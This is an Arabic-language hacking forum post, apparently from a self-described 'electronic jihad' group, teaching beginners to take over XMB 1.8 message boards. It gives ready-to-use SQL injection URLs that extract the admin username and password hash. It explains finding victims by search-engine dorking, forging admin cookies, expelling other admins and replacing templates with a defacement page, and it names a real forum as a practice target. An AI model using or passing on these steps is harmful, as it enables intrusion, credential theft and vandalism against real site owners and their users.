Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ثغرات المنتدى


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ثغرات المنتدى
Permalink   
 


السلام عليكم ورحمة الله
اليوم سوف نعلمكم احتراف اختراق المنتديات وهذة البداية لتعلم الاختراق
هانطبق مع بعض ثغرة سهلة وفعالة بالاكواد الصحيحة من نوع xmb 8
اولا: كود لجلب اسم الادمن




CODE

stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*
ثانيا : كود لجلب الهاش




CODE

stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*

 اجرى روح على محرك البحث البحث القوقل او الام اس ان انصح به واكتب هذا السكريبت
Powered by XMB 1.8 Partagium Final SP2 ولكن انصح بان تكتب هذا لكى تكون النتائج اكثر
Powered by XMB 1.8 بعد ماندخل على المنتدى ونكتب الكود بعد مجلد المنتدى للحصول على الادمن
[bimg]http://members.lycos.co.uk/ameer22/ad1.jpg[/bimg]
بعدين نكتب الكود الثانى للحصول على الباص المشفر
[bimg]http://members.lycos.co.uk/ameer22/ad2.jpg[/bimg]
بعد الحصول على الادمن والباص المشفر اجرى روح سجل فى المنتدى كما واضح فى الصورة فى بعض المنتديات بترسل باص العضو على الاميل ملحوظة هامة يجب ان يكون معرفك مساوى لعدد حروف الادمن
[bimg]http://members.lycos.co.uk/ameer22/ad3.jpg[/bimg]
اكى ناخد الباص والمعرف وندخل كما فى الصورة
[bimg]http://members.lycos.co.uk/ameer22/ad4.jpg[/bimg]
الحين عليك تنزل برنامج الكوكيز وانا حاطة فى اخر الشرح واتبع الصور
[bimg]http://members.lycos.co.uk/ameer22/ad5.jpg[/bimg]
احزف اسم معرفك وضع بدله معرف الادمن وسيف
[bimg]http://members.lycos.co.uk/ameer22/d6.jpg[/bimg]
احزف باصك وضع باص الادمن المشفر الى جبناها وسيف
[bimg]http://members.lycos.co.uk/ameer22/ad7.jpg[/bimg]
اقفل اى صفحة تخص المنتدى الى بنخترقه وافتح المنتدى من جديد مبروك اصبحت الادمن عليك تغير البروفيل
[bimg]http://members.lycos.co.uk/ameer22/ad8.jpg[/bimg]

الصورة بتوضح وانا بغير الاميل والباص الادمن
[bimg]http://members.lycos.co.uk/ameer22/ad9.jpg[/bimg]
بعدين ادخل على قائمة الاعضاء دور على اى ادمن غيرك واطردة ملحوظة خلى بالك لتطرد نفسك وتبوظ الدونيا
وبعديها هانخش على التمبليت المنتدى زى موضح فى الصورة
[bimg]http://members.lycos.co.uk/ameer22/ad10.jpg[/bimg]
دور على كلمة footer وعمل ايديت وشيل الكتابة وحفظ التغيرات
[bimg]http://members.lycos.co.uk/ameer22/ad11.jpg[/bimg]
بعديها دور على كلمة forumdisplay شيل الكود واحفظ التغيرات
[bimg]http://members.lycos.co.uk/ameer22/ad12.jpg[/bimg]
بعديها دور على كلمة header واحزفها خالص
[bimg]http://members.lycos.co.uk/ameer22/ad13.jpg[/bimg]
اخر خطوة دور على index اعمل ايديت احزف الكود وضع كود صفحة الاختراق بتاعتك وارجع للمنتدى هاتجدها ظهرت
[bimg]http://members.lycos.co.uk/ameer22/ad14.jpg[/bimg]
اخوانى هذة الثغرة شرحت اكثر من مرة ولكنى حابيت ان اشرحها بالتفصيل اكثر لكى نساعد المبتدائين
واى استفسار من الاخوة انا حاضر ياريت الاستفسار يكون فى المنتدى مش على المسنجر
والمنتدى الى شرحت عليه مامستهوش انتم جربوا عليه http://www.fall-guy.com/fg/lounge/
كليك يمين وحفظ باسم القراصنة العرب برنامج الكوكيز
من وراء البحار



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard